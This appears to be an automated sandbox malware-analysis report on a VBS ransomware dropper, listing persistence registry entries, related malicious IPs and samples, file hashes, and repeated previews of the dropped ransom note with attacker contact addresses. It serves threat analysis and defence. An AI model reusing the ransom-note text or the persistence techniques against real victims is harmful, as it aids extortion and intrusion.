                                                                                                          192.168.2.12
                                                                                                          127.0.0.1
                                                                                                          Joe Sandbox version:41.0.0 Charoite
                                                                                                          Analysis ID:1575761
                                                                                                          Start date and time:2024-12-16 09:52:35 +01:00
                                                                                                          Joe Sandbox product:CloudBasic
                                                                                                          Overall analysis duration:0h 8m 56s
                                                                                                          Hypervisor based Inspection enabled:false
                                                                                                          Report type:full
                                                                                                          Cookbook file name:default.jbs
                                                                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                          Number of analysed new started processes analysed:67
                                                                                                          Number of new started drivers analysed:0
                                                                                                          Number of existing processes analysed:0
                                                                                                          Number of existing drivers analysed:0
                                                                                                          Number of injected processes analysed:0
                                                                                                          Technologies:
                                                                                                          • HCA enabled
                                                                                                          • EGA enabled
                                                                                                          • AMSI enabled
                                                                                                          Analysis Mode:default
                                                                                                          Analysis stop reason:Timeout
                                                                                                          Sample name:NOTIFICATION_OF_DEPENDANTS.vbs
                                                                                                          Detection:MAL
                                                                                                          Classification:mal100.rans.phis.troj.spyw.expl.evad.winVBS@100/739@5/6
                                                                                                          EGA Information:Failed
                                                                                                          HCA Information:
                                                                                                          • Successful, ratio: 100%
                                                                                                          • Number of executed functions: 0
                                                                                                          • Number of non-executed functions: 0
                                                                                                          Cookbook Comments:
                                                                                                          • Found application associated with file extension: .vbs
                                                                                                          • Exclude process from analysis (whitelisted): dllhost.exe, consent.exe, RuntimeBroker.exe, SIHClient.exe, WmiPrvSE.exe, svchost.exe
                                                                                                          • Excluded IPs from analysis (whitelisted): 172.217.21.35, 172.217.19.238, 173.194.222.84, 172.217.17.46, 23.218.208.109, 217.20.58.98, 192.229.221.95, 172.217.17.35, 34.104.35.123, 172.217.19.206, 20.109.210.53, 13.107.246.63
                                                                                                          • Excluded domains from analysis (whitelisted): clients1.google.com, client.wns.windows.com, fs.microsoft.com, accounts.google.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, clientservices.googleapis.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, fe3cr.delivery.mp.microsoft.com, clients2.google.com, ocsp.digicert.com, redirector.gvt1.com, edgedl.me.gvt1.com, e16604.g.akamaiedge.net, update.googleapis.com, clients.l.google.com, prod.fs.microsoft.com.akadns.net
                                                                                                          • Not all processes where analyzed, report is missing behavior information
                                                                                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                          • Report size getting too big, too many NtCreateFile calls found.
                                                                                                          • Report size getting too big, too many NtCreateKey calls found.
                                                                                                          • Report size getting too big, too many NtOpenFile calls found.
                                                                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                          • Report size getting too big, too many NtQueryVolumeInformationFile calls found.
                                                                                                          • Report size getting too big, too many NtReadFile calls found.
                                                                                                          • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                          TimeTypeDescription
                                                                                                          03:53:59API Interceptor121x Sleep call for process: powershell.exe modified
                                                                                                          03:54:02API Interceptor2x Sleep call for process: svchost.exe modified
                                                                                                          03:54:33API Interceptor1x Sleep call for process: rundll32.exe modified
                                                                                                          03:54:39API Interceptor6x Sleep call for process: WMIC.exe modified
                                                                                                          09:54:42AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run XPSUDTARW C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                          09:54:50AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run XPSUDTARW C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                          09:55:04AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Decryptfiles.txt
                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                          239.255.255.250https://cavotec-au.sharefile.com/public/share/web-1271a93971714a91Get hashmaliciousHTMLPhisherBrowse
                                                                                                            attachment.emlGet hashmaliciousUnknownBrowse
                                                                                                              https://omnirayoprah.cfd/orzbqGet hashmaliciousUnknownBrowse
                                                                                                                https://account.network-auth.com/Get hashmaliciousUnknownBrowse
                                                                                                                  https://zde.soundestlink.com/ce/c/675fab7ba82aca38b8d991e6/675fabf585cd17d1e3e2bb78/675fac13057112d43b540576?signature=da009f44f7cd45aeae4fbb5addf15ac91fbf725bb5e9405183f25bf1db8c8baaGet hashmaliciousUnknownBrowse
                                                                                                                    https://keepsmiling.co.in/front/indexxxx.html?em=NT43NUs6MllJO0ZdVTkzKSA8NzlDOkcgTjhWXU0=Get hashmaliciousUnknownBrowse
                                                                                                                      https://www.paypal.com/signin/?returnUri=%2Fmyaccount%2Ftransfer%2FpayRequest%2FU-7DW79067WM944534C%2FU-3RN06382B68072443%3FclassicUrl%3D%2FUS%2Fcgi-bin%2F%3Fcmd%3D_prq&id=mv2NVEuUR9VvkcyUJ89EG.tzUFO5CbJFQUTSWg&expId=p2p&onboardData=%7B%22signUpRequest%22%3A%7B%22method%22%3A%22get%22%2C%22url%22%3A%22https%3A%2F%2Fwww.paypal.com%2Fmyaccount%2Ftransfer%2FguestLogin%2FpayRequest%2FU-7DW79067WM944534C%2FU-3RN06382B68072443%3FclassicUrl%3D%2FUS%2Fcgi-bin%2F%3Fcmd%3D_prq%26id%3Dmv2NVEuUR9VvkcyUJ89EG.tzUFO5CbJFQUTSWg%22%7D%7D&flowContextData=3VhkG6GfeMFpPs0RyY94VfaPuu2gnDuZkT0vO2-Owy5Q0TLELhHoBl0C3rYOuScB-P1puLFiHoe8q1yHNkorMrsQ-kVAt54br43PgY3iTrhwRm0aS_TYpgjIbliH5dfDJJr3q03bJkAa9vLd7Cr3oAjCQ5rfmoQCALWFn-qszHw7Rd_aj20-SECud0ZSxh-oKENUYjnmdRqAckr48r-ddvc-Vgo4zQnu7JkI5YB_1CxdutYkC-X7iD96T-7aDJhAmyxkfGKQ53prsK5Kys2hLiVrkCjSURM1RSmWzlwznlByQzHhv1R0VrGdaW03mCZt_U0pKOeWAwiNac8f&v=1&utm_source=unp&utm_medium=email&utm_campaign=RT000186&utm_unptid=16a0a3c3-b960-11ef-862e-f3094488c6dd&ppid=RT000186&cnac=US&rsta=en_US%28en-US%29&unptid=16a0a3c3-b960-11ef-862e-f3094488c6dd&calc=f53338153f55e&unp_tpcid=requestmoney-notifications-requestee&page=main%3Aemail%3ART000186&pgrp=main%3Aemail&e=cl&mchn=em&s=ci&mail=sys&appVersion=1.295.0&tenant_name=&xt=145585%2C150948%2C104038&link_ref=www.paypal.com_signinGet hashmaliciousUnknownBrowse
                                                                                                                        https://stoss3.libooc.comGet hashmaliciousUnknownBrowse
                                                                                                                          http://18.224.21.137/FFmnpShhHMMWeIqsVa2rJ69xinQlZ-7450Get hashmaliciousUnknownBrowse
                                                                                                                            lem.exeGet hashmaliciousVidarBrowse
                                                                                                                              45.125.67.168TD2HjoogPx.dllGet hashmaliciousUnknownBrowse
                                                                                                                                NOTIFICATION_OF_DEPENDANTS.vbsGet hashmaliciousUnknownBrowse
                                                                                                                                  108.158.75.80http://productfocus.comGet hashmaliciousUnknownBrowse
                                                                                                                                    https://www.drvhub.netGet hashmaliciousUnknownBrowse
                                                                                                                                      https://www.dropbox.com/l/AADbLOqftgPkdsTWgBgFyNpmu-iGeYJGM4IGet hashmaliciousUnknownBrowse
                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                        d12y248af9ueom.cloudfront.netNOTIFICATION_OF_DEPENDANTS.vbsGet hashmaliciousUnknownBrowse
                                                                                                                                        • 108.158.75.92
                                                                                                                                        NOTIFICATION_OF_DEPENDANTS.vbsGet hashmaliciousUnknownBrowse
                                                                                                                                        • 108.158.75.92
                                                                                                                                        https://ury.io/aVPeBaGet hashmaliciousUnknownBrowse
                                                                                                                                        • 52.222.214.74
                                                                                                                                        kiltone.topTD2HjoogPx.dllGet hashmaliciousUnknownBrowse
                                                                                                                                        • 45.125.67.168
                                                                                                                                        NOTIFICATION_OF_DEPENDANTS.vbsGet hashmaliciousUnknownBrowse
                                                                                                                                        • 45.125.67.168
                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                        AMAZON-02UShttps://cavotec-au.sharefile.com/public/share/web-1271a93971714a91Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                        • 76.223.1.166
                                                                                                                                        la.bot.arc.elfGet hashmaliciousMiraiBrowse
                                                                                                                                        • 54.171.230.55
                                                                                                                                        Space.ppc.elfGet hashmaliciousMiraiBrowse
                                                                                                                                        • 54.217.10.153
                                                                                                                                        Space.mips.elfGet hashmaliciousMiraiBrowse
                                                                                                                                        • 34.249.145.219
                                                                                                                                        lmao.exeGet hashmaliciousQuasarBrowse
                                                                                                                                        • 52.8.11.142
                                                                                                                                        executablelol.exeGet hashmaliciousQuasarBrowse
                                                                                                                                        • 52.9.128.160
                                                                                                                                        negarque.exeGet hashmaliciousQuasarBrowse
                                                                                                                                        • 50.18.181.119
                                                                                                                                        enai2.exeGet hashmaliciousNjratBrowse
                                                                                                                                        • 3.69.115.178
                                                                                                                                        fern_wifi_recon%2.34.exeGet hashmaliciousMetasploitBrowse
                                                                                                                                        • 3.6.115.64
                                                                                                                                        Krishna33.exeGet hashmaliciousAsyncRATBrowse
                                                                                                                                        • 13.215.170.190
                                                                                                                                        TELE-ASTeleAsiaLimitedHKTD2HjoogPx.dllGet hashmaliciousUnknownBrowse
                                                                                                                                        • 45.125.67.168
                                                                                                                                        NOTIFICATION_OF_DEPENDANTS.vbsGet hashmaliciousUnknownBrowse
                                                                                                                                        • 45.125.67.168
                                                                                                                                        R7bv9d6gTH.dllGet hashmaliciousUnknownBrowse
                                                                                                                                        • 103.253.43.248
                                                                                                                                        http://9089357365.com/Get hashmaliciousPhisherBrowse
                                                                                                                                        • 45.125.65.213
                                                                                                                                        UBONg7lmVR.exeGet hashmaliciousUnknownBrowse
                                                                                                                                        • 45.125.66.18
                                                                                                                                        UBONg7lmVR.exeGet hashmaliciousUnknownBrowse
                                                                                                                                        • 45.125.66.18
                                                                                                                                        1feP5qTCl0.exeGet hashmaliciousUnknownBrowse
                                                                                                                                        • 45.125.66.18
                                                                                                                                        V6ZsDcgx4N.exeGet hashmaliciousUnknownBrowse
                                                                                                                                        • 45.125.66.18
                                                                                                                                        V6ZsDcgx4N.exeGet hashmaliciousUnknownBrowse
                                                                                                                                        • 45.125.66.18
                                                                                                                                        https://57365oo.cc/Get hashmaliciousPhisherBrowse
                                                                                                                                        • 45.125.65.213
                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                        1138de370e523e824bbca92d049a3777DVW8WyapUR.exeGet hashmaliciousSpyrix KeyloggerBrowse
                                                                                                                                        • 173.222.162.60
                                                                                                                                        #U661f#U8fb0#U9b54#U57df.exeGet hashmaliciousMetasploitBrowse
                                                                                                                                        • 173.222.162.60
                                                                                                                                        Employee Bonus for Ronnie.benton.docxGet hashmaliciousUnknownBrowse
                                                                                                                                        • 173.222.162.60
                                                                                                                                        9ITJSe7JI2.docGet hashmaliciousUnknownBrowse
                                                                                                                                        • 173.222.162.60
                                                                                                                                        KoyoCaFyPF.docGet hashmaliciousUnknownBrowse
                                                                                                                                        • 173.222.162.60
                                                                                                                                        h0Pbthg2yM.docGet hashmaliciousUnknownBrowse
                                                                                                                                        • 173.222.162.60
                                                                                                                                        rcNDmdah2W.docGet hashmaliciousUnknownBrowse
                                                                                                                                        • 173.222.162.60
                                                                                                                                        in.exeGet hashmaliciousBabadeda, HTMLPhisherBrowse
                                                                                                                                        • 173.222.162.60
                                                                                                                                        file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                        • 173.222.162.60
                                                                                                                                        https://liveisdestiny.me/librarydll2.exeGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                        • 173.222.162.60
                                                                                                                                        3b5074b1b5d032e5620f69f9f700ff0eInvoiceNr274728.pdf.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                        • 45.125.67.168
                                                                                                                                        • 20.198.119.84
                                                                                                                                        A6IuJ5NneS.lnkGet hashmaliciousLummaCBrowse
                                                                                                                                        • 45.125.67.168
                                                                                                                                        • 20.198.119.84
                                                                                                                                        KlarnaInvoice229837.pdf.lnkGet hashmaliciousLummaCBrowse
                                                                                                                                        • 45.125.67.168
                                                                                                                                        • 20.198.119.84
                                                                                                                                        Arrival Notice.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                        • 45.125.67.168
                                                                                                                                        • 20.198.119.84
                                                                                                                                        SWIFT091816-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                        • 45.125.67.168
                                                                                                                                        • 20.198.119.84
                                                                                                                                        REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                        • 45.125.67.168
                                                                                                                                        • 20.198.119.84
                                                                                                                                        jignesh.exeGet hashmaliciousQuasarBrowse
                                                                                                                                        • 45.125.67.168
                                                                                                                                        • 20.198.119.84
                                                                                                                                        skibidi.exeGet hashmaliciousQuasarBrowse
                                                                                                                                        • 45.125.67.168
                                                                                                                                        • 20.198.119.84
                                                                                                                                        vanilla.exeGet hashmaliciousQuasarBrowse
                                                                                                                                        • 45.125.67.168
                                                                                                                                        • 20.198.119.84
                                                                                                                                        givenbestupdatedoingformebestthingswithgreatnewsformegive.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                                                                                                        • 45.125.67.168
                                                                                                                                        • 20.198.119.84
                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                        C:\Users\user\AppData\Local\Temp\eryy65ty.exeTD2HjoogPx.dllGet hashmaliciousUnknownBrowse
                                                                                                                                          NOTIFICATION_OF_DEPENDANTS.vbsGet hashmaliciousUnknownBrowse
                                                                                                                                            C:\Users\user\AppData\Local\Temp\fjeljies.cplNOTIFICATION_OF_DEPENDANTS.vbsGet hashmaliciousUnknownBrowse
                                                                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1310720
                                                                                                                                              Entropy (8bit):0.7946902490148207
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:1536:pJNVxIssjfjonQaKQA0bTMe0bS0bfQJZfhcZyPzJ0iDub69OGd+lJzZgSsrEGTWg:pJV3wb7cOrGqXuT72iIa5lzhpLpYQ
                                                                                                                                              MD5:F884CCE51E188C8179A98DA13AAFF4C1
                                                                                                                                              SHA1:7241710A471B58005A875E688352C3C0F27ED9B9
                                                                                                                                              SHA-256:3C9A1DE259FBEAA4D454135B9E9E35F669CF2C0E01DD2D3D9EC8D63245A5CA13
                                                                                                                                              SHA-512:1B06CDC211D9FDE6D2AE5841F6FE20B522B72CDF194A83AD13C349C6F4D1939E0DDC87E5EBBBBD8C2B518942AEA7A29ABF207B39E81BEDAE800D809254715784
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:.{..........@..@.....{...;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@...................... ...........4...Bv=.#.........`h.................h.!.....6.......X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................
                                                                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                                                                              File Type:Extensible storage engine DataBase, version 0x620, checksum 0x06e440fd, page size 16384, DirtyShutdown, Windows version 10.0
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1310720
                                                                                                                                              Entropy (8bit):0.7816626785153429
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:1536:hSB2ESB2SSjlK/dviQJ5dyDkZA0bVQJOYkr3g16xz2UPkLk+k0KQRkjskjD+qaN4:hazanvxugz2UESQ
                                                                                                                                              MD5:D27F3DE054EA29AD3C1D0B559C00E4A8
                                                                                                                                              SHA1:6B25F30840B53C28EDE77B922D2E99D2C7960DED
                                                                                                                                              SHA-256:8593810D360AE3293F3FCDCE896DFE66008840E2B505FB4A9FB9E009B9976AB2
                                                                                                                                              SHA-512:9320E47F738040D465FEC31481BAE10F4C85A200AEA8CD0760C60CDF3207B639E0A89478E107C32674437A7FE47BD7AEB4989A433EAC074DB8FFDDFDF5A9E3C9
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:..@.... .......J.......X\...;...{......................0.o..........{%..6...|..h.q.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ............{...............................................................................................................................................................................................2...{..................................<m...6...|a.................m\..6...|...........................#......h.q.....................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):16384
                                                                                                                                              Entropy (8bit):0.07875309992298025
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:3:eS/lEYeQVGkflntSlsVlBcXY47all12St/ll/SnPK/t:eiyzHwtWsPilajlf
                                                                                                                                              MD5:FF2E43C150C412B80B2BF7EC65755FFA
                                                                                                                                              SHA1:FD67162B5291D9BC3DE2B33E61DEBACB71E2D537
                                                                                                                                              SHA-256:B8F0B3672319B4AAC52DADC99B82DE56F82D09D2A618FA3B81237EA464F7ACD9
                                                                                                                                              SHA-512:CF2871F23664E509D3F83DFED735F181C61FD79DCC6C8C92A0ADD4C2B3746BC74DDE07AC3F672ED585B13FAA4B6C55D5AFE4A6861881C94FEFA760731D931700
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:.........................................;...{...6...|.......{%..............{%......{%.d........{%.................m\..6...|..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):4165
                                                                                                                                              Entropy (8bit):4.793237544333736
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:cvNlHaKqHidXtV8TTU+2SUw/6sJl0Xs403ay3Id7Hf:Qn6FH4eTU+2zwysJl0Xs40X4d7Hf
                                                                                                                                              MD5:4B259C0407539130EF482A2BA2704103
                                                                                                                                              SHA1:A679D0E6E16F132CD4709B175AC1647E9E98E8A4
                                                                                                                                              SHA-256:A1A7C610B7254AF2B5A7F8B905C2FAA1FE0EAFA68F6AFCF6F8D58B6FBB5B2CA7
                                                                                                                                              SHA-512:C91C60CB551598268328E43D98D5DC1F0FFCC8E3BEC9AAEB72AF0426E48F1912E479B3C955DC45286C47A1B742B6FC0FD4442446B6E4A83311696C2081F6348C
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :1B4910FA33AB622F7DC5D2AF0A960A05D154D5BC18A850AA28E4EFBAFFD77A4EA585193EAC8A427D137B0A23A019DFA2A7CE8D5EE6EB631E5F2FE2F9AE9B2C338BEC79491D4D2AD0DE16280DB3F138734412798A3519E1FDF6E6855423C
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):4165
                                                                                                                                              Entropy (8bit):4.793237544333736
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:cvNlHaKqHidXtV8TTU+2SUw/6sJl0Xs403ay3Id7Hf:Qn6FH4eTU+2zwysJl0Xs40X4d7Hf
                                                                                                                                              MD5:4B259C0407539130EF482A2BA2704103
                                                                                                                                              SHA1:A679D0E6E16F132CD4709B175AC1647E9E98E8A4
                                                                                                                                              SHA-256:A1A7C610B7254AF2B5A7F8B905C2FAA1FE0EAFA68F6AFCF6F8D58B6FBB5B2CA7
                                                                                                                                              SHA-512:C91C60CB551598268328E43D98D5DC1F0FFCC8E3BEC9AAEB72AF0426E48F1912E479B3C955DC45286C47A1B742B6FC0FD4442446B6E4A83311696C2081F6348C
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :1B4910FA33AB622F7DC5D2AF0A960A05D154D5BC18A850AA28E4EFBAFFD77A4EA585193EAC8A427D137B0A23A019DFA2A7CE8D5EE6EB631E5F2FE2F9AE9B2C338BEC79491D4D2AD0DE16280DB3F138734412798A3519E1FDF6E6855423C
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):4165
                                                                                                                                              Entropy (8bit):4.793237544333736
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:cvNlHaKqHidXtV8TTU+2SUw/6sJl0Xs403ay3Id7Hf:Qn6FH4eTU+2zwysJl0Xs40X4d7Hf
                                                                                                                                              MD5:4B259C0407539130EF482A2BA2704103
                                                                                                                                              SHA1:A679D0E6E16F132CD4709B175AC1647E9E98E8A4
                                                                                                                                              SHA-256:A1A7C610B7254AF2B5A7F8B905C2FAA1FE0EAFA68F6AFCF6F8D58B6FBB5B2CA7
                                                                                                                                              SHA-512:C91C60CB551598268328E43D98D5DC1F0FFCC8E3BEC9AAEB72AF0426E48F1912E479B3C955DC45286C47A1B742B6FC0FD4442446B6E4A83311696C2081F6348C
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :1B4910FA33AB622F7DC5D2AF0A960A05D154D5BC18A850AA28E4EFBAFFD77A4EA585193EAC8A427D137B0A23A019DFA2A7CE8D5EE6EB631E5F2FE2F9AE9B2C338BEC79491D4D2AD0DE16280DB3F138734412798A3519E1FDF6E6855423C
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):4165
                                                                                                                                              Entropy (8bit):4.793237544333736
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:cvNlHaKqHidXtV8TTU+2SUw/6sJl0Xs403ay3Id7Hf:Qn6FH4eTU+2zwysJl0Xs40X4d7Hf
                                                                                                                                              MD5:4B259C0407539130EF482A2BA2704103
                                                                                                                                              SHA1:A679D0E6E16F132CD4709B175AC1647E9E98E8A4
                                                                                                                                              SHA-256:A1A7C610B7254AF2B5A7F8B905C2FAA1FE0EAFA68F6AFCF6F8D58B6FBB5B2CA7
                                                                                                                                              SHA-512:C91C60CB551598268328E43D98D5DC1F0FFCC8E3BEC9AAEB72AF0426E48F1912E479B3C955DC45286C47A1B742B6FC0FD4442446B6E4A83311696C2081F6348C
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :1B4910FA33AB622F7DC5D2AF0A960A05D154D5BC18A850AA28E4EFBAFFD77A4EA585193EAC8A427D137B0A23A019DFA2A7CE8D5EE6EB631E5F2FE2F9AE9B2C338BEC79491D4D2AD0DE16280DB3F138734412798A3519E1FDF6E6855423C
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):4165
                                                                                                                                              Entropy (8bit):4.793237544333736
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:cvNlHaKqHidXtV8TTU+2SUw/6sJl0Xs403ay3Id7Hf:Qn6FH4eTU+2zwysJl0Xs40X4d7Hf
                                                                                                                                              MD5:4B259C0407539130EF482A2BA2704103
                                                                                                                                              SHA1:A679D0E6E16F132CD4709B175AC1647E9E98E8A4
                                                                                                                                              SHA-256:A1A7C610B7254AF2B5A7F8B905C2FAA1FE0EAFA68F6AFCF6F8D58B6FBB5B2CA7
                                                                                                                                              SHA-512:C91C60CB551598268328E43D98D5DC1F0FFCC8E3BEC9AAEB72AF0426E48F1912E479B3C955DC45286C47A1B742B6FC0FD4442446B6E4A83311696C2081F6348C
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :1B4910FA33AB622F7DC5D2AF0A960A05D154D5BC18A850AA28E4EFBAFFD77A4EA585193EAC8A427D137B0A23A019DFA2A7CE8D5EE6EB631E5F2FE2F9AE9B2C338BEC79491D4D2AD0DE16280DB3F138734412798A3519E1FDF6E6855423C
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:modified
                                                                                                                                              Size (bytes):1265
                                                                                                                                              Entropy (8bit):7.846265988988591
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24:STErGvkNtjO6FyYKF+ifkhVLdyoYZOslSbnPMlwNe4Im6y9f49JRwygegfcu3+H:pE+77ifkhFdSZAbPswj99eHfgegfcuG
                                                                                                                                              MD5:4FCAAE5A86591802D884C24DF160BF82
                                                                                                                                              SHA1:90D472C1C2ECBA1BC2EF2E163C9307A267B9032C
                                                                                                                                              SHA-256:5D19D90EBE8F3560D7F1D796CFBE56105ECE6EC5F9D64E03C84BD1D27D0F0BD4
                                                                                                                                              SHA-512:795C5E7318AB30D0BE2CF22A364F4EEC872C34970E72EBEC1ACE48BC3062A34DDA5C5CF74F7D4F1EDB0CA2F9B6E92A2806B15C6A42AA159F2DC0916498109FFA
                                                                                                                                              Malicious:false
